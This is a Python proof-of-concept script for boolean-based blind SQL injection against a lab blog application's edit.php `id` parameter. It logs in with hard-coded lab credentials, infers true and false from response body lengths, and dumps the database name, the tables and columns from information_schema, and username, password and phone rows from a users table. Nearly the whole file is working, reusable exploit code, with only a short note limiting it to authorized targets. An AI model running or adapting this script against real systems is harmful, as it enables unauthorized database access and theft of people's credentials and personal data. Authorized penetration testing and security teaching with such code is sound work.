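# -*- coding: utf-8 -*-
# @Time    : 2022/6/16 17:12
# @Author  : admin
# @Email   : 1985264689@qq.com
# @File    : blindtk.py
# @Project : 项目
# @Description :
#   Boolean-based blind SQL injection proof of concept against a lab blog
#   application. The `id` parameter of edit.php is injectable; whether an
#   injected predicate is true is inferred from the response body length.
#   The script logs in, extracts the current database name, the table list,
#   each table's columns and finally username/password/phone rows of `users`.
#
#   Run this only against systems you are explicitly authorized to test. The
#   host, path, table and column names below are specific to that lab target.
from typing import Optional

import requests

# --- lab target ------------------------------------------------------------
# Hard-coded credentials belong to the local test VM only.
BASE_URL = 'http://192.168.0.0/learn/blog'
LOGIN_URL = f'{BASE_URL}/login-1.php'
INJECT_URL = f'{BASE_URL}/edit.php'
LOGIN_DATA = {'username': 'admin', 'password': '123456', 'vcode': '0000'}

# Per-request timeout: without one a stalled connection hangs the whole run,
# and at roughly len(CHARSET) requests per extracted character that is a lot
# of waiting.
TIMEOUT = 10

# Characters tried at each position. NOTE: MySQL's default *_ci collations
# compare case-insensitively, so an uppercase letter in the data matches its
# lowercase probe and is reported in lowercase; compare against
# `binary substr(...)` if exact case matters. Characters outside this set
# (e.g. '@', '.', '-') cannot be extracted and are reported as UNKNOWN_CHAR
# once the value's length is known.
CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789,_:'
UNKNOWN_CHAR = '?'

# Upper bounds on the positions probed per extracted value, kept from the
# original script. group_concat() output is additionally truncated by MySQL
# at group_concat_max_len (1024 by default).
MAX_DB_NAME_LEN = 15
MAX_TABLE_LIST_LEN = 15
MAX_COLUMN_LIST_LEN = 100
MAX_USERS_DUMP_LEN = 200


class Oracle:
    """Boolean oracle over the injectable `id` parameter of edit.php.

    Each predicate is sent as `id=1 and <predicate>`; the response body length
    is compared with two baselines captured by calibrate() (a known-true and a
    known-false predicate) and the nearer one decides.

    This replaces the original running-mode heuristic (append the length,
    take the most common length seen so far, treat "longer than the mode" as
    true). That heuristic can never flag the *first* probe after a reset as
    true, because the only length seen so far is the mode itself, so a
    database name starting with 'a' was silently missed; it also assumed the
    true page is longer and that false responses dominate, neither of which
    is checked.
    """

    def __init__(self, session: requests.Session) -> None:
        self._session = session
        self._true_len: Optional[int] = None
        self._false_len: Optional[int] = None

    def _body_length(self, predicate: str) -> int:
        """Send the injected request and return the response body length.

        The payload is interpolated into the query string unencoded and left
        to requests' URL normalization, exactly as the original did.
        len(resp.text) counts decoded characters, matching the original
        measurement; len(resp.content) would avoid charset detection per
        request if this ever becomes the bottleneck.
        """
        resp = self._session.get(f'{INJECT_URL}?id=1 and {predicate}', timeout=TIMEOUT)
        return len(resp.text)

    def calibrate(self) -> None:
        """Capture baseline lengths for a true and a false predicate.

        Raises SystemExit when both pages have the same length: the oracle
        could then never tell true from false and every extraction would come
        back empty. That usually means the login failed (edit.php redirected)
        or `id` is not injectable on this target.
        """
        self._true_len = self._body_length('1=1')
        self._false_len = self._body_length('1=2')
        if self._true_len == self._false_len:
            raise SystemExit(
                'oracle cannot discriminate: "and 1=1" and "and 1=2" both return '
                f'{self._true_len} characters (login failed or id not injectable?)'
            )

    def ask(self, predicate: str) -> bool:
        """Return True if `predicate` evaluates true inside the injected query.

        Raises RuntimeError if calibrate() has not been called.
        """
        if self._true_len is None or self._false_len is None:
            raise RuntimeError('Oracle.calibrate() must run before ask()')
        length = self._body_length(predicate)
        # Nearest baseline wins, so small dynamic differences in the page
        # (timestamps, tokens) do not flip the verdict the way exact equality
        # with the true-page length would.
        return abs(length - self._true_len) < abs(length - self._false_len)


def probe_length(oracle: Oracle, expr: str, max_len: int) -> Optional[int]:
    """Return length(`expr`) if it lies in 1..max_len, else None.

    None means the value is empty/NULL, longer than max_len, or the oracle is
    unreliable; callers then fall back to scanning all max_len positions.
    """
    for n in range(1, max_len + 1):
        if oracle.ask(f'length({expr})={n}'):
            return n
    return None


def extract(oracle: Oracle, expr: str, max_len: int) -> str:
    """Extract the string value of MySQL expression `expr` one character at a time.

    `expr` must be self-contained (e.g. `database()` or a parenthesized scalar
    subquery). The length is probed first so exactly that many positions are
    scanned; when it cannot be determined all max_len positions are scanned,
    which is what the original did unconditionally.

    Positions start at 1: MySQL substr() is 1-based and position 0 always
    yields '', so the original's range(0, ...) loops spent len(CHARSET)
    requests per value on a position that could never match.
    """
    length = probe_length(oracle, expr, max_len)
    known_length = length is not None
    positions = length if known_length else max_len
    chars: list[str] = []
    for pos in range(1, positions + 1):
        for ch in CHARSET:
            if oracle.ask(f'substr({expr},{pos},1)="{ch}"'):
                chars.append(ch)
                break
        else:
            # Nothing in CHARSET matched. With a known length the position is
            # real, so mark it rather than silently shifting the rest of the
            # value left; in fallback mode "end of string" and "unsupported
            # character" are indistinguishable, so skip it as before.
            if known_length:
                chars.append(UNKNOWN_CHAR)
    return ''.join(chars)


def main() -> None:
    """Log in, calibrate the oracle and dump the schema and `users` rows to stdout."""
    session = requests.Session()
    # edit.php is only reachable with an authenticated session. Login success
    # is not verified here (the success page is not known to this script); a
    # failed login surfaces as an indistinguishable oracle in calibrate().
    session.post(LOGIN_URL, data=LOGIN_DATA, timeout=TIMEOUT)

    oracle = Oracle(session)
    oracle.calibrate()

    db_name = extract(oracle, 'database()', MAX_DB_NAME_LEN)
    print(db_name)

    tables_expr = (
        '(select group_concat(table_name) from information_schema.tables '
        f'where table_schema="{db_name}")'
    )
    table_list = extract(oracle, tables_expr, MAX_TABLE_LIST_LEN)
    print(table_list)

    # group_concat joins names with ','. Drop the empty entry split() yields
    # for an empty list so we never query table_name="".
    for table in filter(None, table_list.strip().split(',')):
        columns_expr = (
            '(select group_concat(column_name) from information_schema.columns '
            f'where table_schema="{db_name}" and table_name="{table}" )'
        )
        print(extract(oracle, columns_expr, MAX_COLUMN_LIST_LEN))

    # Table and column names are specific to this lab application; adjust them
    # to what the column dump above reports. (The original quoted the substr
    # position for this payload only, "{m}", relying on MySQL's implicit
    # string-to-int coercion; the integer form used by the other payloads is
    # used uniformly now.)
    users_expr = '(select group_concat(concat_ws(":",username,password,phone)) from users)'
    print(extract(oracle, users_expr, MAX_USERS_DUMP_LEN))


if __name__ == '__main__':
    main()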
Python SQL布尔型盲注